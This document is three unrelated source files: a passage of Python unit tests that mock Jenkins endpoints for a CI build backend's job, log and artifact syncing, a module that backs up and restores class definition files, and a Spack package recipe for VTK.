responses.POST, 'http://jenkins-diff.example.com/job/server/build',
body='',
status=201)
find_job.return_value = {
'build_no': '1',
'item_id': None,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins-diff.example.com',
}
patch = Patch(
repository=self.project.repository,
parent_revision_sha='7ebd1f2d750064652ef5bbff72452cc19e1731e0',
diff=SAMPLE_DIFF,
)
db.session.add(patch)
source = self.create_source(self.project, patch=patch)
build = self.create_build(self.project, source=source)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8')
)
builder = self.get_builder()
builder.create_job(job)
@responses.activate
def test_multi_master(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
jobstep_id = uuid5_from(job_id)
responses.add(
responses.GET, 'http://jenkins-2.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list_other_jobs.json'),
status=200)
responses.add(
responses.GET, 'http://jenkins.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list.json'),
status=200)
responses.add(
responses.POST, 'http://jenkins-2.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
'http://jenkins-2.example.com/queue/api/xml/?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fid&wrapper=x'.format(jobstep_id),
status=404,
match_querystring=True)
responses.add(
responses.GET,
'http://jenkins-2.example.com/job/server/api/xml/?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fnumber&depth=1&wrapper=x'.format(jobstep_id),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'),
match_querystring=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.master_urls = [
'http://jenkins.example.com',
'http://jenkins-2.example.com',
]
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data['master'] == 'http://jenkins-2.example.com'
@responses.activate
def test_multi_master_one_bad(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
jobstep_id = uuid5_from(job_id)
responses.add(
responses.GET, 'http://jenkins-2.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list_other_jobs.json'),
status=200)
# This one has a failure status.
responses.add(
responses.GET, 'http://jenkins.example.com/queue/api/json/',
body='',
status=503)
responses.add(
responses.POST, 'http://jenkins-2.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
'http://jenkins-2.example.com/queue/api/xml/?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fid&wrapper=x'.format(jobstep_id),
status=404,
match_querystring=True)
responses.add(
responses.GET,
'http://jenkins-2.example.com/job/server/api/xml/?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fnumber&depth=1&wrapper=x'.format(jobstep_id),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'),
match_querystring=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.master_urls = [
'http://jenkins.example.com',
'http://jenkins-2.example.com',
]
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data['master'] == 'http://jenkins-2.example.com'
class CancelStepTest(BaseTestCase):
@responses.activate
def test_queued(self):
responses.add(
responses.POST, 'http://jenkins.example.com/queue/cancelItem?id=13',
match_querystring=True, status=302)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'item_id': 13,
'job_name': 'server',
'master': 'http://jenkins.example.com',
}, status=Status.queued)
builder = self.get_builder()
builder.cancel_step(step)
assert step.result == Result.aborted
assert step.status == Status.finished
@responses.activate
def test_active(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/stop/',
body='', status=302)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'job_name': 'server',
'master': 'http://jenkins.example.com',
}, status=Status.in_progress)
builder = self.get_builder()
builder.cancel_step(step)
assert step.status == Status.finished
assert step.result == Result.aborted
@responses.activate
def test_timeouts_sync_log(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
# The job is not yet complete after this sync step so no logs yet.
builder.sync_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source is None
step.data['timed_out'] = True
builder.cancel_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source.step == step
assert source.name == step.label
assert source.project == self.project
assert source.date_created == step.date_started
chunks = list(LogChunk.query.filter_by(
source=source,
).order_by(LogChunk.date_created.asc()))
assert len(chunks) == 1
assert chunks[0].job_id == job.id
assert chunks[0].project_id == self.project.id
assert chunks[0].offset == 0
assert chunks[0].size == 7
assert chunks[0].text == 'Foo bar'
assert step.data.get('log_offset') == 7
class SyncStepTest(BaseTestCase):
@responses.activate
def test_waiting_in_queue(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_pending.json'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.status == Status.queued
@responses.activate
def test_cancelled_in_queue(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_cancelled.json'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.status == Status.finished
assert step.result == Result.aborted
@responses.activate
def test_queued_to_active(self):
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': None,
'item_id': 13,
'job_name': 'server',
'queued': True,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
@responses.activate
def test_success_result(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_success.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
assert step.status == Status.finished
assert step.result == Result.passed
assert step.date_finished is not None
@responses.activate
def test_failed_result(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
assert step.data['build_no'] == 2
assert step.status == Status.finished
assert step.result == Result.failed
assert step.date_finished is not None
@responses.activate
@mock.patch('changes.backends.jenkins.builder.time')
def test_result_slow_log(self, mock_time):
mock_time.time.return_value = time.time()
def log_text_callback(request):
# Zoom 10 minutes into the future; this should cause the console
# downloading code to bail
mock_time.time.return_value += 10 * 60
data = "log\n" * 10000
return (200, {'X-Text-Size': str(len(data))}, data)
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add_callback(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
callback=log_text_callback)
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
assert len(step.logsources) == 1
chunks = list(LogChunk.query.filter_by(
source=step.logsources[0],
).order_by(LogChunk.offset.asc()))
assert len(chunks) == 2
assert "TOO LONG TO DOWNLOAD" in chunks[1].text
class SyncGenericResultsTest(BaseTestCase):
@responses.activate
def test_does_sync_log(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_failed.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
builder = self.get_builder()
builder.sync_step(step)
source = LogSource.query.filter_by(job=job).first()
assert source.step == step
assert source.name == step.label
assert source.project == self.project
assert source.date_created == step.date_started
chunks = list(LogChunk.query.filter_by(
source=source,
).order_by(LogChunk.date_created.asc()))
assert len(chunks) == 1
assert chunks[0].job_id == job.id
assert chunks[0].project_id == self.project.id
assert chunks[0].offset == 0
assert chunks[0].size == 7
assert chunks[0].text == 'Foo bar'
assert step.data.get('log_offset') == 7
@responses.activate
@mock.patch('changes.backends.jenkins.builder.sync_artifact')
def test_does_fire_sync_artifacts(self, sync_artifact):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_with_artifacts.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '0'},
body='')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
log_artifact = Artifact.query.filter(
Artifact.name == 'foobar.log',
Artifact.step == step,
).first()
assert log_artifact.data == {
"displayPath": "foobar.log",
"fileName": "foobar.log",
"relativePath": "artifacts/foobar.log",
}
sync_artifact.delay_if_needed.assert_any_call(
artifact_id=log_artifact.id.hex,
task_id=log_artifact.id.hex,
parent_task_id=step.id.hex,
skip_checks=False,
)
xunit_artifact = Artifact.query.filter(
Artifact.name == 'tests.xml',
Artifact.step == step,
).first()
assert xunit_artifact.data == {
"displayPath": "tests.xml",
"fileName": "tests.xml",
"relativePath": "artifacts/tests.xml",
}
sync_artifact.delay_if_needed.assert_any_call(
artifact_id=xunit_artifact.id.hex,
task_id=xunit_artifact.id.hex,
parent_task_id=step.id.hex,
skip_checks=False,
)
class SyncPhasedResultsTest(BaseTestCase):
@responses.activate
def test_does_sync_phases(self):
phase_data = {
"retcode": 0,
"command": ["echo", "foo bar"],
"log": "test.log",
"startTime": 1403645499.39586,
"endTime": 1403645500.398765,
"name": "Test"
}
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_with_phase_artifacts.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/test.phase.json',
body=json.dumps(phase_data))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
})
builder = self.get_builder()
builder.sync_step(step)
# the log should still get populated for the existing phase
source = LogSource.query.filter_by(job=job).first()
assert source.step == step
assert source.name == step.label
assert source.project == self.project
assert source.date_created == step.date_started
chunks = list(LogChunk.query.filter_by(
source=source,
).order_by(LogChunk.date_created.asc()))
assert len(chunks) == 1
assert chunks[0].job_id == job.id
assert chunks[0].project_id == self.project.id
assert chunks[0].offset == 0
assert chunks[0].size == 7
assert chunks[0].text == 'Foo bar'
assert step.data.get('log_offset') == 7
other_phases = list(JobPhase.query.filter(
JobPhase.job_id == job.id,
JobPhase.id != phase.id,
))
assert len(other_phases) == 1
test_phase = other_phases[0]
assert test_phase.label == 'Test'
assert test_phase.result == Result.passed
assert test_phase.status == Status.finished
assert test_phase.date_started == datetime(2014, 6, 24, 21, 31, 39, 395860)
assert test_phase.date_finished == datetime(2014, 6, 24, 21, 31, 40, 398765)
assert len(test_phase.steps) == 1
test_step = test_phase.steps[0]
assert test_step.label == step.label
assert test_step.result == test_phase.result
assert test_step.status == test_phase.status
assert test_step.node == step.node
assert test_step.data == {
'job_name': 'server',
'build_no': 2,
'generated': True,
'master': 'http://jenkins.example.com',
}
assert test_step.date_started == test_phase.date_started
assert test_step.date_finished == test_phase.date_finished
log_artifact = Artifact.query.filter(
Artifact.name == 'test.log',
Artifact.step_id == test_step.id,
).first()
assert log_artifact.data == {
"displayPath": "test.log",
"fileName": "test.log",
"relativePath": "artifacts/test.log",
}
class SyncArtifactTest(BaseTestCase):
@responses.activate
def test_sync_artifact_as_log(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/foobar.log',
body='hello world')
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='foobar.log', data={
"displayPath": "foobar.log",
"fileName": "foobar.log",
"relativePath": "artifacts/foobar.log"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
source = LogSource.query.filter(
LogSource.job_id == job.id,
LogSource.name == 'foobar.log',
).first()
assert source is not None
assert source.step == step
assert source.project == self.project
chunks = list(LogChunk.query.filter_by(
source=source,
).order_by(LogChunk.date_created.asc()))
assert len(chunks) == 1
assert chunks[0].job_id == job.id
assert chunks[0].project_id == self.project.id
assert chunks[0].offset == 0
assert chunks[0].size == 11
assert chunks[0].text == 'hello world'
@responses.activate
def test_sync_artifact_as_xunit(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/xunit.xml',
body=SAMPLE_XUNIT,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='xunit.xml', data={
"displayPath": "xunit.xml",
"fileName": "xunit.xml",
"relativePath": "artifacts/xunit.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
test_list = list(TestCase.query.filter(
TestCase.job_id == job.id
))
assert len(test_list) == 2
@responses.activate
def test_sync_artifact_as_coverage(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/coverage.xml',
body=SAMPLE_COVERAGE,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='coverage.xml', data={
"displayPath": "coverage.xml",
"fileName": "coverage.xml",
"relativePath": "artifacts/coverage.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
cover_list = list(FileCoverage.query.filter(
FileCoverage.job_id == job.id
))
assert len(cover_list) == 2
@responses.activate
def test_sync_artifact_as_file(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/foo.bar',
body=SAMPLE_COVERAGE,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='foo.bar', data={
"displayPath": "foo.bar",
"fileName": "foo.bar",
"relativePath": "artifacts/foo.bar"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
class SyncTestArtifactsTest(BaseTestCase):
@responses.activate
def test_sync_testartifacts(self):
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/artifact/artifacts/xunit.xml',
body=SAMPLE_XUNIT_TESTARTIFACTS,
stream=True)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8'),
data={
'build_no': 2,
'item_id': 13,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins.example.com',
},
)
phase = self.create_jobphase(job)
step = self.create_jobstep(phase, data=job.data)
artifact = self.create_artifact(step, name='xunit.xml', data={
"displayPath": "xunit.xml",
"fileName": "xunit.xml",
"relativePath": "artifacts/xunit.xml"
})
builder = self.get_builder()
builder.sync_artifact(artifact)
test_artifacts = list(TestArtifact.query)
test = TestCase.query.first()
assert len(test_artifacts) == 1
test_artifact = test_artifacts[0]
assert test_artifact.file.get_file().read() == "sample_content"
assert test_artifact.name == "sample_name.txt"
assert str(test_artifact.type) == "Text"
assert test_artifact.test == test
class JenkinsIntegrationTest(BaseTestCase):
"""
This test should ensure a full cycle of tasks completes successfully within
the jenkins builder space.
"""
# it's possible for this test to infinitely hang due to continuous polling,
# so let's ensure we set a timeout
@pytest.mark.timeout(5)
@mock.patch('changes.config.redis.lock', mock.MagicMock())
@eager_tasks
@responses.activate
def test_full(self):
from changes.jobs.create_job import create_job
job_id = '81d1596fd4d642f4a6bdf86c45e014e8'
jobstep_id = uuid5_from(job_id)
# TODO: move this out of this file and integrate w/ buildstep
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
'http://jenkins.example.com/queue/api/xml/?wrapper=x&xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22+and+action%2Fparameter%2Fvalue%3D%22{}%22%5D%2Fid'.format(jobstep_id),
body=self.load_fixture('fixtures/GET/queue_item_by_job_id.xml'),
match_querystring=True)
responses.add(
responses.GET, 'http://jenkins.example.com/queue/item/13/api/json/',
body=self.load_fixture('fixtures/GET/queue_details_building.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/api/json/',
body=self.load_fixture('fixtures/GET/job_details_success.json'))
responses.add(
responses.GET, 'http://jenkins.example.com/job/server/2/logText/progressiveText/?start=0',
match_querystring=True,
adding_headers={'X-Text-Size': '7'},
body='Foo bar')
responses.add(
responses.GET, 'http://jenkins.example.com/computer/server-ubuntu-10.04%20(ami-746cf244)%20(i-836023b7)/config.xml',
body=self.load_fixture('fixtures/GET/node_config.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(job_id))
plan = self.create_plan(self.project)
self.create_step(
plan, order=0, implementation='changes.backends.jenkins.buildstep.JenkinsBuildStep', data={
'job_name': 'server',
'jenkins_url': 'http://jenkins.example.com',
},
)
self.create_job_plan(job, plan)
job_id = job.id.hex
build_id = build.id.hex
create_job.delay(
job_id=job_id,
task_id=job_id,
parent_task_id=build_id,
)
job = Job.query.get(job_id)
assert job.status == Status.finished
assert job.result == Result.passed
assert job.date_created
assert job.date_started
assert job.date_finished
phase_list = job.phases
assert len(phase_list) == 1
assert phase_list[0].status == Status.finished
assert phase_list[0].result == Result.passed
assert phase_list[0].date_created
assert phase_list[0].date_started
assert phase_list[0].date_finished
step_list = phase_list[0].steps
assert len(step_list) == 1
assert step_list[0].status == Status.finished
assert step_list[0].result == Result.passed
assert step_list[0].date_created
assert step_list[0].date_started
assert step_list[0].date_finished
assert step_list[0].data == {
'item_id': '13',
'queued': False,
'log_offset': 7,
'job_name': 'server',
'build_no': 2,
'uri': 'https://jenkins.build.itc.dropbox.com/job/server/2/',
'master': 'http://jenkins.example.com',
}
node = step_list[0].node
assert node.label == 'server-ubuntu-10.04 (ami-746cf244) (i-836023b7)'
assert [n.label for n in node.clusters] == ['server-runner']
source = LogSource.query.filter_by(job=job).first()
assert source.name == step_list[0].label
assert source.step == step_list[0]
assert source.project == self.project
assert source.date_created == job.date_started
chunks = list(LogChunk.query.filter_by(
source=source,
).order_by(LogChunk.date_created.asc()))
assert len(chunks) == 1
assert chunks[0].job_id == job.id
assert chunks[0].project_id == self.project.id
assert chunks[0].offset == 0
assert chunks[0].size == 7
assert chunks[0].text == 'Foo bar'
|
import os
import sys
from types import ModuleType
from .module_loading import load_module
# we assume that our code is always run from the root dir of this repo and nobody tampers with the python path
# we use this to determine whether we should make a backup of the file of a class or not, because if it is from
# our code base it might contain breaking changes in the future
code_root_path = sys.path[0]
def get_import_info(chain):
backup_info = get_backup_info(get_module(chain), chain)
return {
"import_string": f"from {backup_info['module_path']} import {backup_info['class_name']}",
"class_name": backup_info['class_name'],
}
def generate_backup_plan(chain):
# TODO: does not work yet, if child has children that need to be backed up...
# maximum of one level is allowed right now
plan = {
"root_object": get_backup_info(get_module(chain), chain),
"children": generate_child_backup_plan(chain),
}
return remove_duplicates_from_backup_plan(plan)
def generate_child_backup_plan(parent):
children_to_backup = []
for child in parent.children():
child_module = get_module(child)
# flag this module as necessary for update only if it is in our code base
if code_root_path in child_module.__file__:
children_to_backup.append(get_backup_info(child_module, child))
children_to_backup.extend(generate_child_backup_plan(child))
return children_to_backup
def get_backup_info(module, obj):
return {
"module_path": module.__name__,
"class_name": obj.__class__.__name__,
"files": (get_definition_filepath(obj), get_definition_filename(obj))
}
def remove_duplicates_from_backup_plan(plan):
unique_children = []
module_paths = [plan['root_object']['module_path']]
for child in plan['children']:
if child['module_path'] in module_paths:
continue
module_paths.append(child['module_path'])
unique_children.append(child)
plan['children'] = unique_children
return plan
def get_module(obj):
return __import__(obj.__module__, fromlist=obj.__module__.split('.')[:-1])
def get_definition_filepath(obj):
return get_module(obj).__file__
def get_definition_filename(obj):
return os.path.basename(get_definition_filepath(obj))
def restore_backup(backup_plan, backup_dir):
if 'import_string' in backup_plan:
exec(backup_plan['import_string'])
klass = eval(backup_plan['class_name'])
return klass
# 1. load root module with network definition
root_module = load_module(os.path.abspath(os.path.join(backup_dir, backup_plan['root_object']["files"][1])))
# 2. adapt pointers to other modules that we created a backup of
for child in backup_plan['children']:
child_module = load_module(
os.path.abspath(os.path.join(backup_dir, child['files'][1])),
module_path=child['module_path']
)
for name in filter(lambda x: not x.startswith('_'), dir(root_module)):
module_attr = getattr(root_module, name)
if isinstance(module_attr, ModuleType) or module_attr.__module__ != child['module_path']:
# if the attr we grabbed from the module is itself a module (so make sure to import everything directly!!)
# or if the module path does not fit to the path we saved we have a look at the next attr
continue
if module_attr.__name__ != child['class_name']:
# we do not have the correct class right now
continue
setattr(root_module, name, getattr(child_module, child['class_name']))
break
return getattr(root_module, backup_plan['root_object']['class_name'])
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
import sys
from spack import *
class Vtk(CMakePackage):
"""The Visualization Toolkit (VTK) is an open-source, freely
available software system for 3D computer graphics, image
processing and visualization. """
homepage = "http://www.vtk.org"
url = "http://www.vtk.org/files/release/8.0/VTK-8.0.1.tar.gz"
list_url = "http://www.vtk.org/download/"
version('8.1.2', sha256='0995fb36857dd76ccfb8bb07350c214d9f9099e80b1e66b4a8909311f24ff0db')
version('8.1.1', sha256='71a09b4340f0a9c58559fe946dc745ab68a866cf20636a41d97b6046cb736324')
version('8.0.1', '692d09ae8fadc97b59d35cab429b261a')
version('7.1.0', 'a7e814c1db503d896af72458c2d0228f')
version('7.0.0', '5fe35312db5fb2341139b8e4955c367d')
version('6.3.0', '0231ca4840408e9dd60af48b314c5b6d')
version('6.1.0', '25e4dfb3bad778722dcaec80cd5dab7d')
# VTK7 defaults to OpenGL2 rendering backend
variant('opengl2', default=True, description='Enable OpenGL2 backend')
variant('osmesa', default=False, description='Enable OSMesa support')
variant('python', default=False, description='Enable Python support')
variant('qt', default=False, description='Build with support for Qt')
variant('xdmf', default=False, description='Build XDMF file support')
variant('ffmpeg', default=False, description='Build with FFMPEG support')
variant('mpi', default=True, description='Enable MPI support')
patch('gcc.patch', when='@6.1.0')
# At the moment, we cannot build with both osmesa and qt, but as of
# VTK 8.1, that should change
conflicts('+osmesa', when='+qt')
depends_on('python', when='+python')
depends_on('py-mpi4py', when='+mpi +python', type='run')
extends('python', when='+python')
# python3.7 compatibility patch backported from upstream
# https://gitlab.kitware.com/vtk/vtk/commit/706f1b397df09a27ab8981ab9464547028d0c322
patch('python3.7-const-char.patch', when='@:8.1.1 ^python@3.7:')
# The use of the OpenGL2 backend requires at least OpenGL Core Profile
# version 3.2 or higher.
depends_on('gl@3.2:', when='+opengl2')
depends_on('gl@1.2:', when='~opengl2')
if sys.platform != 'darwin':
depends_on('glx', when='~osmesa')
# Note: it is recommended to use mesa+llvm, if possible.
# mesa default is software rendering, llvm makes it faster
depends_on('mesa+osmesa', when='+osmesa')
# VTK will need Qt5OpenGL, and qt needs '-opengl' for that
depends_on('qt+opengl', when='+qt')
depends_on('mpi', when='+mpi')
depends_on('boost', when='+xdmf')
depends_on('boost+mpi', when='+xdmf +mpi')
depends_on('mpi', when='+mpi')
depends_on('ffmpeg', when='+ffmpeg')
depends_on('expat')
depends_on('freetype')
depends_on('glew')
depends_on('hdf5')
depends_on('libjpeg')
